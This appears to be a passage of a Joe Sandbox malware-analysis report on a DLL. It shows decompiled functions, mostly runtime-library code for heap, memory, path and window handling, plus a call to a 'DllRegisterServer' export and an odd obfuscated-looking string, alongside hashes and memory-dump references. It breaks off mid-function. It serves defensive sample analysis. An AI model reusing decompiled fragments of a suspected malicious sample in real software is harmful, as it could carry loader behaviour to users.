Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 81c4f9537eb770243fdc0a32d7e47a3285133bc035b71f969f81bf8c0384ebd2
Instruction ID: 5c52f8c4d727126c86f77c33851e7c0b5fa0ee0d1993fb30478bf6546009c500
Opcode Fuzzy Hash: 81c4f9537eb770243fdc0a32d7e47a3285133bc035b71f969f81bf8c0384ebd2
Instruction Fuzzy Hash: 94F01DF1140625EEF3008B85CEC6F433BA8E34B718F11800AE344EB6D1D7B614688F6A

Uniqueness

Uniqueness Score: -1.00%

Function 1000373C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000373C() {
				int _t1;

				_t1 =  *0x10046a8c; // 0x151acd8
				if(_t1 == 0) {
					ExitProcess(_t1);
				}
				 *((intOrPtr*)(E10003122(_t1, "DllRegisterServer")))(); // executed
				return 0;
			}

0x1000373c
0x10003743
0x10003746
0x10003746
0x10003759
0x1000375d

APIs

ExitProcess.KERNEL32 ref: 10003746

Strings

DllRegisterServer, xrefs: 1000374C

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: ExitProcess
String ID: DllRegisterServer
API String ID: 621844428-1663957109
Opcode ID: 291628bf29a1733aeefe0036b6084d4be0373c307bf806f308028e93738353d8
Instruction ID: 5b79a9f3272a285f0bc727d2d6f4db5e8a7be798465fbb40fb281ab7da0c5106
Opcode Fuzzy Hash: 291628bf29a1733aeefe0036b6084d4be0373c307bf806f308028e93738353d8
Instruction Fuzzy Hash: A4C08CF22082016BF602EBB08C8880B238CEB08292311C808F000D7005EF39E4000A00

Uniqueness

Uniqueness Score: -1.00%

Function 10024B73 Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10024B73(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10048aa4 = _t6;
				if(_t6 != 0) {
					_t7 = E10024B18(__eflags);
					__eflags = _t7 - 3;
					 *0x1004a564 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E10024019(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x10048aa4);
							 *0x10048aa4 =  *0x10048aa4 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

0x10024b84
0x10024b8c
0x10024b91
0x10024b96
0x10024b9b
0x10024b9e
0x10024ba3
0x10024bc9
0x10024bcb
0x10024bcc
0x10024ba5
0x10024baa
0x10024baf
0x10024bb2
0x00000000
0x10024bb4
0x10024bba
0x10024bc0
0x00000000
0x10024bc0
0x10024bb2
0x10024b93
0x10024b93
0x10024b95
0x10024b95

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,100207AC,00000001,?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C), ref: 10024B84
HeapDestroy.KERNEL32(?,?,00000001,?,?,1002092A,00000001,?,?,10041328,0000000C,100209E4,?), ref: 10024BBA

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: a1744ea04a4e4aac06c1af9c57638635ef45047b2ea6b21dfa4896526f954c19
Instruction ID: 7ecfd6e5781d3b6a0fc92bf663133c7527b62661b4374eaf376562758425141b
Opcode Fuzzy Hash: a1744ea04a4e4aac06c1af9c57638635ef45047b2ea6b21dfa4896526f954c19
Instruction Fuzzy Hash: 26E02230A123129EF786CB30AF8671A33F4EB06382F424836F004C98A0FFB0C140DA05

Uniqueness

Uniqueness Score: -1.00%

Function 100036FA Relevance: 1.5, APIs: 1, Instructions: 28
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E100036FA(void* __ebx, void* __esi, void* __eflags) {
				void* _t2;
				signed int _t7;
				char _t9;
				signed int _t12;
				void* _t14;
				void* _t15;
				signed int _t17;

				_t2 = E1001F631(__ebx, _t14, _t15, __esi,  *0x100440e4);
				if(_t2 != 0) {
					_t12 =  *0x100440e4; // 0x0
					_push(__ebx);
					_t9 = 0;
					__eflags = _t12;
					_push(__esi);
					_t17 = _t12;
					if(__eflags > 0) {
						do {
							 *((char*)(_t9 + _t2)) = _t9;
							_t9 = _t9 + 1;
							__eflags = _t9 -  *0x100440e4; // 0x0
						} while (__eflags < 0);
					}
					_push(_t2); // executed
					E1001F6F4(_t9, _t15, _t17, __eflags); // executed
					asm("sbb eax, eax");
					_t7 =  ~(_t9 - _t17) & 0x00000003;
					__eflags = _t7;
					return _t7;
				} else {
					return _t2;
				}
			}

0x10003700
0x10003708
0x1000370b
0x10003711
0x10003712
0x10003714
0x10003716
0x10003717
0x10003719
0x1000371b
0x1000371b
0x1000371e
0x1000371f
0x1000371f
0x1000371b
0x10003727
0x10003728
0x10003734
0x10003737
0x10003737
0x1000373b
0x1000370a
0x1000370a
0x1000370a

APIs

_malloc.LIBCMT ref: 10003700

Part of subcall function 1001F631: __FF_MSGBANNER.LIBCMT ref: 1001F654
Part of subcall function 1001F631: __NMSG_WRITE.LIBCMT ref: 1001F65B
Part of subcall function 1001F631: HeapAlloc.KERNEL32(00000000,-0000000E,00000001,00000000,00000000,?,1002692B,?,00000001,00000001,10023F72,00000018,100413C8,0000000C,10024001,00000001), ref: 1001F6A9

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: AllocHeap_malloc
String ID:
API String ID: 3293231637-0
Opcode ID: 2f76cf260a46a9d53b32d34cea165e875efa5fab80f71dccc9ba808c39acbc3c
Instruction ID: adc5ccbd96ec724cefc73a2f5283e4f6b1af06d455631b59cbb6fed6ff4e13e7
Opcode Fuzzy Hash: 2f76cf260a46a9d53b32d34cea165e875efa5fab80f71dccc9ba808c39acbc3c
Instruction Fuzzy Hash: 53E086BA2141A24AFF19DAF89EE68562748D7110913228A7EE646C6556DA20E8208250

Uniqueness

Uniqueness Score: -1.00%

Function 10020E42 Relevance: 1.5, APIs: 1, Instructions: 6
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 25%

			E10020E42() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E10020D63(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}

0x10020e42
0x10020e44
0x10020e46
0x10020e48
0x10020e50

APIs

_doexit.LIBCMT ref: 10020E48

Part of subcall function 10020D63: __lock.LIBCMT ref: 10020D71
Part of subcall function 10020D63: __decode_pointer.LIBCMT ref: 10020DA0
Part of subcall function 10020D63: __decode_pointer.LIBCMT ref: 10020DAD

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: __decode_pointer$__lock_doexit
String ID:
API String ID: 3276244213-0
Opcode ID: 97d4102892187832ff4b1b75b5546cda8401932d03e1046da499ccbf3089c980
Instruction ID: ebb22d002e4bc0be4ce9b3835a93604f57b833b8c7c0406f906832a81f765660
Opcode Fuzzy Hash: 97d4102892187832ff4b1b75b5546cda8401932d03e1046da499ccbf3089c980
Instruction Fuzzy Hash: 0CA00279BD530062F871D1903CD3F5421065750F01FD40051BB182C1C2A5C732584057

Uniqueness

Uniqueness Score: -1.00%

Function 1000302D Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000302D(void* _a4, long _a8, long _a12, long _a16) {
				void* _t5;

				_t5 = VirtualAlloc(_a4, _a8, _a12, _a16); // executed
				return _t5;
			}

0x1000303d
0x10003043

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 1000303D

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1fbba5c948703a5d5ab931949a929f4f09bd1ed6a173005a8193a93e686e7ec2
Instruction ID: 5d0982da9e6573c30bbcbca7a50cfe3a5b7972743b959b5c0e66da410622836f
Opcode Fuzzy Hash: 1fbba5c948703a5d5ab931949a929f4f09bd1ed6a173005a8193a93e686e7ec2
Instruction Fuzzy Hash: 1CB00832418792EBDF02DF90CD4482ABAA2BB89301F184C5CF6A151570D7228468EF07

Uniqueness

Uniqueness Score: -1.00%

Function 10003044 Relevance: 1.3, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10003044(void* _a4, long _a8, long _a12) {
				int _t4;

				_t4 = VirtualFree(_a4, _a8, _a12); // executed
				return _t4;
			}

0x10003050
0x10003056

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 10003050

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: df584dda371157191712c15505aae26ff14b4c57a0491ab4d9c6d3331c076541
Instruction ID: 115bf12ed0fa7589b407f79f41f639b3f7b4823b02c2866c4b7f4f1f1b5172d7
Opcode Fuzzy Hash: df584dda371157191712c15505aae26ff14b4c57a0491ab4d9c6d3331c076541
Instruction Fuzzy Hash: 43B00235408610FFDF025F50DD4480ABBA2BB89321F10D958F1AA51430D7329420EF07

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10011C86 Relevance: 12.1, APIs: 8, Instructions: 129
filestringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E10011C86(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t38;
				long _t49;
				CHAR* _t50;
				CHAR* _t56;
				CHAR* _t59;
				void* _t61;
				int _t65;
				CHAR* _t74;
				void* _t75;
				void* _t76;
				void* _t89;
				void* _t90;
				CHAR* _t92;
				void* _t93;
				void* _t96;
				struct _WIN32_FIND_DATAA* _t98;
				void* _t100;
				CHAR* _t106;

				_t94 = __esi;
				_t90 = __edx;
				_t76 = __ecx;
				_t98 = _t100 - 0x13c;
				_t38 =  *0x10045580; // 0xe155dca3
				 *(_t98 + 0x140) = _t38 ^ _t98;
				_push(0x14);
				E1001FBC4(E10033C93, __ebx, __edi, __esi);
				_t92 =  *(_t98 + 0x14c);
				_t74 =  *(_t98 + 0x150);
				 *((intOrPtr*)(_t98 - 0x18)) =  *((intOrPtr*)(_t98 + 0x154));
				_t106 = _t92;
				_t107 = _t106 == 0;
				if(_t106 == 0) {
					L1:
					E10004E6E(_t74, _t76, _t92, _t94, _t107);
				}
				if((0 | _t74 != 0x00000000) == 0) {
					goto L1;
				}
				_t49 = GetFullPathNameA(_t74, 0x104, _t92, _t98 - 0x14);
				if(_t49 != 0) {
					__eflags = _t49 - 0x104;
					if(_t49 >= 0x104) {
						goto L5;
					} else {
						E1000424F(_t98 - 0x10, E1001044F());
						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
						E10011ABC(_t74, _t98, __eflags, _t92, _t98 - 0x10);
						_t56 = PathIsUNCA( *(_t98 - 0x10));
						__eflags = _t56;
						if(_t56 != 0) {
							L19:
							E10001260( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
							_t50 = 1;
							__eflags = 1;
						} else {
							_t59 = GetVolumeInformationA( *(_t98 - 0x10), _t56, _t56, _t56, _t98 - 0x20, _t98 - 0x1c, _t56, _t56);
							__eflags = _t59;
							if(_t59 != 0) {
								__eflags =  *(_t98 - 0x1c) & 0x00000002;
								if(( *(_t98 - 0x1c) & 0x00000002) == 0) {
									CharUpperA(_t92);
								}
								__eflags =  *(_t98 - 0x1c) & 0x00000004;
								if(( *(_t98 - 0x1c) & 0x00000004) != 0) {
									goto L19;
								} else {
									_t61 = FindFirstFileA(_t74, _t98);
									__eflags = _t61 - 0xffffffff;
									if(_t61 == 0xffffffff) {
										goto L19;
									} else {
										FindClose(_t61);
										__eflags =  *(_t98 - 0x14);
										if( *(_t98 - 0x14) == 0) {
											goto L10;
										} else {
											__eflags =  *(_t98 - 0x14) - _t92;
											if( *(_t98 - 0x14) <= _t92) {
												goto L10;
											} else {
												_t65 = lstrlenA( &(_t98->cFileName));
												_t89 =  *(_t98 - 0x14) - _t92;
												__eflags = _t65 + _t89 - 0x104;
												if(_t65 + _t89 >= 0x104) {
													goto L10;
												} else {
													_t97 = 0x104 - _t89;
													__eflags = 0x104 - _t89;
													E10005C93(_t74, _t90, _t92, 0x104 - _t89, _t98,  *(_t98 - 0x14), _t97,  &(_t98->cFileName));
													goto L19;
												}
											}
										}
									}
								}
							} else {
								_push(_t74);
								E10011C5B( *((intOrPtr*)(_t98 - 0x18)));
								L10:
								E10001260( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
								goto L5;
							}
						}
					}
				} else {
					E10004EB7(_t74, _t76, _t92, 0x104, _t98, _t92, 0x104, _t74, 0xffffffff);
					_push(_t74);
					E10011C5B( *((intOrPtr*)(_t98 - 0x18)));
					L5:
					_t50 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
				_pop(_t93);
				_pop(_t96);
				_pop(_t75);
				return E1001FBB5(_t50, _t75,  *(_t98 + 0x140) ^ _t98, _t90, _t93, _t96);
			}

0x10011c86
0x10011c86
0x10011c86
0x10011c8d
0x10011c91
0x10011c98
0x10011c9e
0x10011ca5
0x10011cb0
0x10011cb6
0x10011cbc
0x10011cc1
0x10011cc6
0x10011cc8
0x10011cca
0x10011cca
0x10011cca
0x10011cd8
0x00000000
0x00000000
0x10011ce6
0x10011cee
0x10011d0d
0x10011d0f
0x00000000
0x10011d11
0x10011d1a
0x10011d1f
0x10011d28
0x10011d30
0x10011d36
0x10011d38
0x10011dca
0x10011dd0
0x10011dd7
0x10011dd7
0x10011d3e
0x10011d4e
0x10011d54
0x10011d56
0x10011d6e
0x10011d72
0x10011d75
0x10011d75
0x10011d7b
0x10011d7f
0x00000000
0x10011d81
0x10011d86
0x10011d8c
0x10011d8f
0x00000000
0x10011d91
0x10011d92
0x10011d98
0x10011d9c
0x00000000
0x10011d9e
0x10011d9e
0x10011da1
0x00000000
0x10011da3
0x10011da7
0x10011db0
0x10011db4
0x10011db6
0x00000000
0x10011db8
0x10011dbc
0x10011dbc
0x10011dc2
0x00000000
0x10011dc7
0x10011db6
0x10011da1
0x10011d9c
0x10011d8f
0x10011d58
0x10011d58
0x10011d5c
0x10011d61
0x10011d67
0x00000000
0x10011d67
0x10011d56
0x10011d38
0x10011cf0
0x10011cf5
0x10011cfd
0x10011d01
0x10011d06
0x10011d06
0x10011d06
0x10011ddb
0x10011de3
0x10011de4
0x10011de5
0x10011dfa

APIs

__EH_prolog3.LIBCMT ref: 10011CA5
GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 10011CE6

Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F

PathIsUNCA.SHLWAPI(?,00000000), ref: 10011D30
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 10011D4E
CharUpperA.USER32(?), ref: 10011D75
FindFirstFileA.KERNEL32(?,00000000), ref: 10011D86
FindClose.KERNEL32(00000000), ref: 10011D92
lstrlenA.KERNEL32(?), ref: 10011DA7

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: FindH_prolog3Path$CharCloseException@8FileFirstFullInformationNameThrowUpperVolumelstrlen
String ID:
API String ID: 4099955704-0
Opcode ID: 34f6f2e06f6c52f7f72971c1c83acd915632a22f9182f0fa51328fb5f4cbc38c
Instruction ID: 71c2b450ac2c88f27229685b2eaf748cff0cdd07423a00f921b144b935e16ce8
Opcode Fuzzy Hash: 34f6f2e06f6c52f7f72971c1c83acd915632a22f9182f0fa51328fb5f4cbc38c
Instruction Fuzzy Hash: E841CD71A0014AAFEB15DBB4CC89AFF77BCEF44355F010529F915EA192EB30E984CA60

Uniqueness

Uniqueness Score: -1.00%

Function 100037A6 Relevance: 9.1, APIs: 6, Instructions: 65
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E100037A6(void* __ecx, void* __edx) {
				signed int _v8;
				int _v88;
				char _v92;
				struct tagRECT _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t16;
				int _t18;
				void* _t19;
				int _t23;
				int _t24;
				void* _t40;
				void* _t48;
				void* _t49;
				void* _t52;
				signed int _t53;

				_t48 = __edx;
				_t16 =  *0x10045580; // 0xe155dca3
				_v8 = _t16 ^ _t53;
				_t52 = __ecx;
				_t18 = IsIconic( *(__ecx + 0x20));
				_t54 = _t18;
				if(_t18 == 0) {
					_t19 = E10007997(_t40, _t52, _t49, _t52, __eflags);
				} else {
					_push(_t40);
					E1001017C(_t40,  &_v92, _t49, _t52, _t54);
					SendMessageA( *(_t52 + 0x20), 0x27, _v88, 0);
					_t23 = GetSystemMetrics(0xb);
					_t24 = GetSystemMetrics(0xc);
					GetClientRect( *(_t52 + 0x20),  &_v108);
					asm("cdq");
					asm("cdq");
					DrawIcon(_v88, _v108.right - _v108.left - _t23 + 1 - _t48 >> 1, _v108.bottom - _v108.top - _t24 + 1 - _t48 >> 1,  *(_t52 + 0x11c));
					_t19 = E100101D0(_t23,  &_v92, _t24, _t52, _t54);
					_t49 = _t52;
					_t40 = _t49;
				}
				return E1001FBB5(_t19, _t40, _v8 ^ _t53, _t48, _t49, _t52);
			}

0x100037a6
0x100037ac
0x100037b3
0x100037b7
0x100037bc
0x100037c2
0x100037c4
0x1000383b
0x100037c6
0x100037c6
0x100037cc
0x100037db
0x100037e9
0x100037ef
0x100037fa
0x1000380f
0x1000381e
0x10003827
0x10003830
0x10003835
0x10003836
0x10003836
0x1000384c

APIs

IsIconic.USER32 ref: 100037BC

Part of subcall function 1001017C: __EH_prolog3.LIBCMT ref: 10010183
Part of subcall function 1001017C: BeginPaint.USER32(?,?,00000004,100079AE,?,00000058,10003840), ref: 100101AF

SendMessageA.USER32 ref: 100037DB
GetSystemMetrics.USER32 ref: 100037E9
GetSystemMetrics.USER32 ref: 100037EF
GetClientRect.USER32(?,?), ref: 100037FA
DrawIcon.USER32 ref: 10003827

Part of subcall function 100101D0: __EH_prolog3.LIBCMT ref: 100101D7
Part of subcall function 100101D0: EndPaint.USER32(?,?,00000004,100079D4,?,?,00000058,10003840), ref: 100101F2

Memory Dump Source

Source File: 00000000.00000002.261026626.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.261016412.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261059914.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261070847.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261084766.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261094429.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261123235.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261144537.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261192986.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.261207792.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: H_prolog3MetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
String ID:
API String ID: 2914073315-0
Opcode ID: 1e7be54cfa6d3c1e1a4138fbb5d3b695b42003d303c7effa8fdb7e59f0e8d856
Instruction ID: d120da58dcfcd53bd7750bb53c5c236feb3430fa3c37942b0e1c20916eef10ca
Opcode Fuzzy Hash: 1e7be54cfa6d3c1e1a4138fbb5d3b695b42003d303c7effa8fdb7e59f0e8d856
Instruction Fuzzy Hash: 11112131A00219AFDB01DFB8CD499AEBBB9FB49704F004128F546DB165DA60A905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10005CE3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70
libraryCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E10005CE3(void* __ebx, void* __ecx, void* __edx, void* __edi, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __esi;
				void* __ebp;
				signed int _t9;
				intOrPtr* _t18;
				void* _t26;
				void* _t27;
				void* _t33;
				signed int _t34;
				void* _t35;
				signed int _t36;
				void* _t37;

				_t33 = __edi;
				_t32 = __edx;
				_t28 = __ecx;
				_t26 = __ebx;
				_t9 =  *0x10045580; // 0xe155dca3
				_v8 = _t9 ^ _t36;
				_t39 = _a4 - 0x800;
				_t35 = __ecx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags != 0) {
						goto L2;
					} else {
					}
				} else {
					_push(E10020E9D(__edx,  &_v288, 4, "LOC"));
					E10001000(__ebx, _t28, __edi, _t35);
					_t37 = _t37 + 0x10;
					L2:
					_push(_t26);
					_push(_t33);
					_t34 =  *(E10020B71(_t39));
					 *(E10020B71(_t39)) =  *_t14 & 0x00000000;
					_t35 = 0x112;
					_t27 = E10020F1E( &_v284, 0x112, 0x111, 0x112,  &_v288);
					_t18 = E10020B71(_t39);
					_t40 =  *_t18;
